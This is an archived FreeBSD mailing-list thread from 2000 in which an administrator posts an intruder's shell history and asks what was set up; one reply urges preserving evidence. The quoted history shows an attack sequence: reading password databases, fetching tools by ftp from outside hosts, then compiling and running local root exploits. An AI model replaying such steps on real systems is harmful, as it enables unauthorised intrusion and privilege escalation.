Date: Mon, 18 Dec 2000 15:56:27 -0500 (EST) From: Joe Oliveiro <joe@advancewebhosting.com> To: Alexander V P <alex@big-blue.net> Cc: "Gerald T. Freymann" <freymann@eagle.ca>, Questions <questions@FreeBSD.ORG> Subject: Re: Hacker history file - OUCH Message-ID: <Pine.BSF.4.21.0012181556100.6889-100000@joe.pythonvideo.com> In-Reply-To: <Pine.BSF.4.05.10012181523480.23598-100000@borg.starbase.net>
next in thread | previous in thread | raw e-mail | index | archive | help
i like wiping the box! Microsoft: "Where would you like to go to today" Linux: "Where would you like to go tomorrow" FreeBSD: "Hey,when are you guys going to catch up" On Mon, 18 Dec 2000, Alexander V P wrote: > hi, > do you keep/have logs about what ftp transfers he did? > did you send mail to root@he.net, or .mx domain? > any idea how he break in? what freebsd you're using? > if i'm on your place, i'll unplug the box and try to find out more about > this. don't do like most of the sysadmins that just wipe the box. > alex > > On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > > > > > Seems we have an intruder on one of our boxes... the .history file from the > > troubled account follows: > > > > cd bnc > > ls > > ./bash > > who > > cd /etc > > more passwd > > ps -l > > ls -l > > more pwd.db > > more hosts > > pico adduser.conf.bak > > pico group > > su user > > pico group.bak > > pico ftpuser > > O > > pico ftpusers > > su toor > > su operator > > id > > pico spwd.db > > su wheel > > pico passwd > > cd /var/tmp > > ls -a > > cd ... > > ls -a > > cd .. > > ls -l > > ls -al > > cd ... > > ftp copper.he.net > > chmod u+x xcon > > ./xcon > > id > > rm * > > ls > > who > > cd /var/tmp > > ls -a > > ls -al > > cd ... > > ls -a > > ftp cih.edu.mx > > ls > > cc bsd1 bsd-cron.c > > cc -o bsd1 bsd-cron.c > > ./bsd1 > > id > > cc -o bsd2 bsd2.c > > ./bsd2 > > id > > ls > > ftp cih.edu.mx > > ./bsd sh > > ./bsd.sh > > chmod u+x bsd.sh > > ./bsd.sh > > /tmp/sh > > id > > ls > > cc -o bsdsmail bsdsmail.c > > ./bsdsmail > > ls -a > > pico hack > > ls > > pico user.inf > > ls > > id > > rm * > > exit > > > > Anybody recognize what the intruder has set up? > > > > -Gerry > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.21.0012181556100.6889-100000>